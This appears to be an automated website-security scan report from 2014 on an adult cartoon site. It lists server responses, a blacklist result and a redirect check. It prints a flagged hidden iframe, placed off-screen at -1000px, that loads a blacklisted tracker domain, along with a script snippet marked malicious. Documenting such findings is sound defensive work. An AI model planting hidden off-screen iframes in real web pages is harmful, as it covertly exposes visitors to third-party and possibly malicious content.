Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xxxdirtytoons.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://xxxdirtytoons.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 17 Jun 2014 12:50:11 GMT Location: http://www.xxxdirtytoons.com/ Server: nginx/1.6.0 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.xxxdirtytoons.com/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://www.xxxdirtytoons.com/ | 200 OK Content-Length: 20691 Content-Type: text/html | malicious |
Page code contains blacklisted domain: pilubas.com
...[24034 bytes skipped]... href="http://www.cartoonreality.com/index.html?id=adwe" target=_blank ><img src="http://drawn-cash.com/promotools/cr/banners/2012/700_100_1.gif"></a></center> <div id="footer"> <center><p>Copyright © 2006 - 2014 <a href="http://www.xxxdirtytoons.com/">Dirty Toon Sex and XXX Toon Porn</a></p></center> </div> </div> <iframe src="http://pilubas.com/trackingcode/tracker.php" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe></body> <script id='popupJS' src='http://chaturbate.com/creative/im/1.js?c=0&filename=cb_im_str8_240x210_03.gif&height=210&width=240&wm=mBxNZ&tour=Lc8u&track=track'></script> </html>
Malicious iFrame found. size: 640x480 src: http://pilubas.com/trackingcode/tracker.php
This URL is marked by Google as suspicious
<iframe src="http://pilubas.com/trackingcode/tracker.php" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'>
http://chaturbate.com/creative/im/1.js?c=0&filename=cb_im_str8_240x210_03.gif&height=210&width=240&wm=mBxNZ&tour=Lc8u&track=track | 200 OK Content-Length: 3528 Content-Type: text/html | clean |
http://chaturbate.com/creative/im/ | 404 NOT FOUND Content-Length: 19331 Content-Type: text/html | clean |
http://chaturbate.com/jsi18n/ | 200 OK Content-Length: 2372 Content-Type: text/javascript | clean |
http://ccstatic.highwebmedia.com/static/CACHE5/js/936fbae33046.js | 200 OK Content-Length: 118690 Content-Type: application/x-javascript | clean |
http://chaturbate.com/ | 200 OK Content-Length: 99656 Content-Type: text/html | clean |
http://ccstatic.highwebmedia.com/static/CACHE5/js/209e2314bf71.js | 200 OK Content-Length: 1922 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var reload_rooms={delay:90000,on_timeout:function(){$(".endless_page_template").each(function(){var href="";if($(this).attr("data-href")==undefined){href=window.location.href;} else{href=$(this).attr("data-href");} var addchar='?';if(href.indexOf('?')!=-1){addchar='&';} href=href+addchar+$("#filter_search_form").serialize();$(this).load(href);});reload_rooms.schedule_refresh();},schedule_refresh:function(){setTimeout(reload_rooms.on_timeout,reload_rooms.delay);}};$(document).read return true;});$("#filter_search_form input[type='submit']").click(function(){var skey=$("#id_keywords").val();var search_message=interpolate(gettext("Searching for %(skey)s ..."),{skey:skey},true);$(".searching-keyword h1").text(search_message);$(".searching-keyword").show();$(".endless_page_template").load($("#filter_search_form").attr("action")+'?'+$("#filter_search_form").serialize());return false;});});
Antivirus reports:
http://chaturbate.com/accounts/register/ | 200 OK Content-Length: 28920 Content-Type: text/html | clean |
http://www.googleadservices.com/pagead/conversion.js | 200 OK Content-Length: 9216 Content-Type: text/javascript | clean |
http://chaturbate.com/tipping/free_tokens/ | HTTP/1.1 302 FOUND Connection: close Date: Tue, 17 Jun 2014 12:50:18 GMT Location: http://chaturbate.com/auth/login/?next=/tipping/free_tokens/ Server: nginx/1.5.13 Vary: Cookie, Accept-Language Content-Language: en Content-Type: text/html; charset=utf-8 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: affkey="eJyrVipSslJQUqoFAAwfAk0="; expires=Thu, 17-Jul-2014 12:50:18 GMT; Max-Age=2592000; Path=/ | clean |
http://chaturbate.com/auth/login/?next=/tipping/free_tokens/ | 200 OK Content-Length: 18789 Content-Type: text/html | clean |
http://chaturbate.com/auth/login/ | 200 OK Content-Length: 17474 Content-Type: text/html | clean |
http://chaturbate.com/auth/password_reset/ | 200 OK Content-Length: 17700 Content-Type: text/html | clean |
http://chaturbate.com/female-cams/ | 200 OK Content-Length: 99050 Content-Type: text/html | clean |
http://chaturbate.com/male-cams/ | 200 OK Content-Length: 98591 Content-Type: text/html | clean |
http://chaturbate.com/couple-cams/ | 200 OK Content-Length: 72189 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xxxdirtytoons.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 17 Jun 2014 12:50:11 GMT
Location: http://www.xxxdirtytoons.com/
Server: nginx/1.6.0
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.xxxdirtytoons.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: xxxdirtytoons.com
Referer: http://www.google.com/search?q=xxxdirtytoons.com
Result:
The result is similar to the first query. There are no suspicious redirects found.